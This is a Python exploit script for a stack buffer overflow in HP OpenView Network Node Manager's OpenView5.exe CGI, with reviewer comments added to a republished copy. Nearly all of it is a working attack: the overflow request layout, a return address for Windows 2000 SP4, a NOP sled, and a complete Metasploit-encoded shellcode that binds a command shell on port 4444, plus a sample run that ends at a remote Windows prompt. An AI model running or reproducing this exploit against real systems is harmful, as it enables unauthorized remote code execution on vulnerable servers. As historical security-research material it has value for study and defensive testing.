hpopen-overflow.txt
Posted on 13 December 2007
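#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
#
# Notes:
# Vanilla stack based overflow, triggered through the Action= parameter of
# the OpenView5.exe CGI.
# I had no idea how to debug this...I ended up modifying the Openview5.exe
# binary by hijacking the entry point and injecting Sleep just before exe
# execution. This gave me enough time to attach a debugger before program
# termination. If anyone knows how to properly debug this, please tell me
# about it - there *must* be a better way...
#
# Reviewer notes (added while cleaning up this copy):
#  * The return address (0x77e14c29, JMP ESP in user32.dll) is specific to
#    Windows 2000 SP4. On any other build the jump lands elsewhere and the
#    CGI process simply crashes, so re-derive it for the target you test.
#  * The payload is an opaque Alpha2-encoded blob. Per the nc transcript
#    below it makes the target listen for a shell on TCP/4444. Treat
#    pre-built shellcode from any source as untrusted input: disassemble it
#    or regenerate it with your own tooling before it touches a host.
#  * The copy of this script that was published had every "\x" escape
#    stripped ("xebx03..."); the escapes are restored below and the blob is
#    exactly the 696 bytes the generator header claims. build_payload() has
#    no network side effects so the bytes can be checked offline.
#  * Run this only against systems you are authorized to test.
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import struct
import sys

# Request line up to the overflowing parameter value.
REQUEST_PREFIX = b"GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
# Filler bytes written before the saved return address is overwritten.
OFFSET_TO_RET = 5123
# JMP ESP, user32.dll, Windows 2000 SP4 (packed little-endian below).
RET_ADDR = 0x77E14C29
NOP_SLED_LEN = 32
# The published script ends the request with this single byte; no HTTP
# version token or headers are sent. NOTE(review): a bare space is not a
# request-line terminator, so the original terminator may have been lost in
# transcription -- confirm against the original before relying on it.
REQUEST_TERMINATOR = b" "
DEFAULT_PORT = 80
CONNECT_TIMEOUT = 10  # seconds; the original blocked forever on connect/send

# Metasploit-generated win32 shell, EXITFUNC=thread LPORT=4444 Size=696
# Encoder=Alpha2 http://metasploit.com
SHELLCODE = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
    b"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x78\x32\x41\x42\x32\x42"
    b"\x41\x30\x42\x41\x41\x58\x38\x41\x42\x50\x75\x6b\x59\x39\x6c\x50"
    b"\x6a\x78\x6b\x30\x4d\x49\x78\x38\x79\x59\x6f\x4b\x4f\x39\x6f\x71"
    b"\x70\x6e\x6b\x50\x6c\x67\x54\x67\x54\x4c\x4b\x72\x65\x65\x6c\x4c"
    b"\x4b\x41\x6c\x36\x65\x42\x58\x46\x61\x4a\x4f\x6c\x4b\x70\x4f\x64"
    b"\x58\x4c\x4b\x73\x6f\x47\x50\x76\x61\x7a\x4b\x50\x49\x6c\x4b\x55"
    b"\x64\x4e\x6b\x54\x41\x7a\x4e\x65\x61\x6f\x30\x6d\x49\x6c\x6c\x4e"
    b"\x64\x4f\x30\x71\x64\x35\x57\x49\x51\x4a\x6a\x56\x6d\x63\x31\x5a"
    b"\x62\x5a\x4b\x79\x64\x77\x4b\x61\x44\x57\x54\x45\x78\x63\x45\x78"
    b"\x65\x6c\x4b\x33\x6f\x44\x64\x53\x31\x48\x6b\x41\x76\x4c\x4b\x54"
    b"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
    b"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
    b"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
    b"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
    b"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
    b"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
    b"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
    b"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
    b"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
    b"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
    b"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
    b"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
    b"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
    b"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
    b"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
    b"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
    b"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
    b"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
    b"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
    b"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
    b"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
    b"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
    b"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
    b"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x4c"
    b"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
    b"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
    b"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
    b"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
    b"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
    b"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
    b"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
    b"\x4f\x6b\x66\x79\x6f\x58\x50\x68"
)


def build_payload():
    """Return the raw request that triggers the overflow, as bytes.

    Layout: REQUEST_PREFIX | OFFSET_TO_RET filler | return address
    (little-endian) | NOP sled | SHELLCODE | REQUEST_TERMINATOR.
    Pure function -- no sockets -- so the bytes can be inspected in a test.
    """
    return b"".join([
        REQUEST_PREFIX,
        b"A" * OFFSET_TO_RET,
        struct.pack("<I", RET_ADDR),  # lands in the saved return address
        b"\x90" * NOP_SLED_LEN,       # ESP points somewhere in this sled
        SHELLCODE,
        REQUEST_TERMINATOR,
    ])


def send_payload(host, port=DEFAULT_PORT, timeout=CONNECT_TIMEOUT):
    """Connect to host:port and send the overflow request.

    Raises socket.error (OSError on Python 3) if the connection or the send
    fails or times out. The socket is closed on every path.
    """
    payload = build_payload()
    print("[+] Connecting to " + host)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        print("[+] Sending Evil Buffer to NNM CGI ")
        # sendall(): a single send() may write only part of a ~5.9 KB buffer.
        sock.sendall(payload)
    finally:
        sock.close()
    print("[+] Payload Sent, ph33r.")


def main(argv):
    """Command-line entry point: sploit <target-host> [port].

    Returns the process exit status: 0 on success, 1 on a network error,
    2 on bad arguments. Port defaults to 80 as in the original script.
    """
    if len(argv) < 2 or len(argv) > 3:
        sys.stderr.write("usage: %s <target-host> [port]\n" % argv[0])
        return 2
    host = argv[1]
    port = DEFAULT_PORT
    if len(argv) == 3:
        try:
            port = int(argv[2])
        except ValueError:
            sys.stderr.write("[-] port must be an integer\n")
            return 2
    try:
        send_payload(host, port)
    except socket.error as exc:
        sys.stderr.write("[-] Network error: %s\n" % exc)
        return 1
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))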